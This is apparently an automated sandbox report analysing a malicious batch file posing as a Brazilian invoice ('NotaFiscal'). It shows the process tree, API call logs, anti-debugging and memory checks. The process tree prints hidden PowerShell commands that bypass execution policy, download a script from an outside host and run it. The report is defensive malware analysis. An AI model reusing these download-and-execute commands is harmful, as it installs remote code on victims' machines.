Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	April 8, 2025, 9:13 a.m.	April 8, 2025, 9:19 a.m.

Size	945.0B
Type	DOS batch file, UTF-8 Unicode text, with CRLF line terminators
MD5	`0906079ea36374150e8d617145021147`
SHA256	`f349010a752484df873c6b00f9949bd986052e28660fb9da4d50a9fe6546a61f`
CRC32	`DFE00645`
ssdeep	`24:Wj3l9IsMa4dGUM2HKDr2dQDaR3i53nSa7Am:Wj3l9e9EYqKRyhnpT`
Yara	None matched

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "THzpDlBA" C:\Users\test22\AppData\Local\Temp\NotaFiscal1.25.bat
2552
- cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\NotaFiscal1.25.bat
  2624
  - net.exe net session
    2712
    - net1.exe C:\Windows\system32\net1 session
      2780
  - powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "if (-not (Get-Command powershell -ErrorAction SilentlyContinue)) { Write-Output 'Instalando o PowerShell...'; Install-PackageProvider -Name NuGet -Force; Install-Module -Name PowerShellGet -Force; Install-Module -Name PSReadline -Force }"
    2836
  - powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://enota.clientepj.com/cliente.ps1' -OutFile 'C:\Users\test22\AppData\Local\Temp\cliente.ps1'"
    2948
  - powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\test22\AppData\Local\Temp\cliente.ps1"
    3036

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (16 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 8, 2025, 9:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 8, 2025, 9:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 8, 2025, 9:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 8, 2025, 9:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 8, 2025, 9:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 8, 2025, 9:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 8, 2025, 9:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 8, 2025, 9:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 8, 2025, 9:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 8, 2025, 9:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 8, 2025, 9:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 8, 2025, 9:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 8, 2025, 9:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 8, 2025, 9:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 8, 2025, 9:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 8, 2025, 9:13 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (3 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 8, 2025, 9:13 a.m.			0	0
IsDebuggerPresent April 8, 2025, 9:13 a.m.			0	0
IsDebuggerPresent April 8, 2025, 9:13 a.m.			0	0

Command line console output was observed (11 events)

Time & API	Arguments	Status	Return
WriteConsoleW April 8, 2025, 9:13 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x0000000b	1	1
WriteConsoleW April 8, 2025, 9:13 a.m.	buffer: The term 'Invoke-WebRequest' is not recognized as the name of a cmdlet, functio console_handle: 0x00000023	1	1
WriteConsoleW April 8, 2025, 9:13 a.m.	buffer: n, script file, or operable program. Check the spelling of the name, or if a pa console_handle: 0x0000002f	1	1
WriteConsoleW April 8, 2025, 9:13 a.m.	buffer: th was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW April 8, 2025, 9:13 a.m.	buffer: At line:1 char:18 console_handle: 0x00000047	1	1
WriteConsoleW April 8, 2025, 9:13 a.m.	buffer: + Invoke-WebRequest <<<< -Uri 'https://enota.clientepj.com/cliente.ps1' -OutFi console_handle: 0x00000053	1	1
WriteConsoleW April 8, 2025, 9:13 a.m.	buffer: le 'C:\Users\test22\AppData\Local\Temp\cliente.ps1' console_handle: 0x0000005f	1	1
WriteConsoleW April 8, 2025, 9:13 a.m.	buffer: + CategoryInfo : ObjectNotFound: (Invoke-WebRequest:String) [], C console_handle: 0x0000006b	1	1
WriteConsoleW April 8, 2025, 9:13 a.m.	buffer: ommandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW April 8, 2025, 9:13 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000083	1	1
WriteConsoleW April 8, 2025, 9:13 a.m.	buffer: The argument 'C:\Users\test22\AppData\Local\Temp\cliente.ps1' to the -File parameter does not exist. Provide the path to an existing '.ps1' file as an argument to the -File parameter. console_handle: 0x0000001f	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 98 events)

Time & API	Arguments	Status	Return
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00651360 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006518e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006518e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006518e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00651460 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00651460 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00651460 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00651460 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00651460 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00651460 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00650f20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00650f20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00650f20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006518e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006518e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006518e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006517e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006518e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006518e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006518e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006518e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006518e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006518e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006518e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00651060 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00651060 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00651060 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00651060 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00651060 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00651060 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00651060 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00651060 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00651060 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00651060 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00651060 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00651060 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00651060 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00651060 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00651ce0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00651ce0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00355450 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003555d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003555d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003555d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00354790 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00354790 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00354790 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00354790 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00354790 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 8, 2025, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00354790 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 8, 2025, 9:13 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 286 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 1966080 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a40000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02be0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01eda000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ed2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f22000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02be1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02be2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f4a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f23000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f24000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f5b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f57000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01edb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f42000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f55000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f25000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f4c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f26000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f5c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f43000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f44000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f45000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f46000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f47000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f48000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f49000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b31000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b32000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b33000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b34000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b35000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b36000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b37000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b38000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b39000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b3a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b3b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b3c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b3d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b3e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b3f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b41000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b42000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b43000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
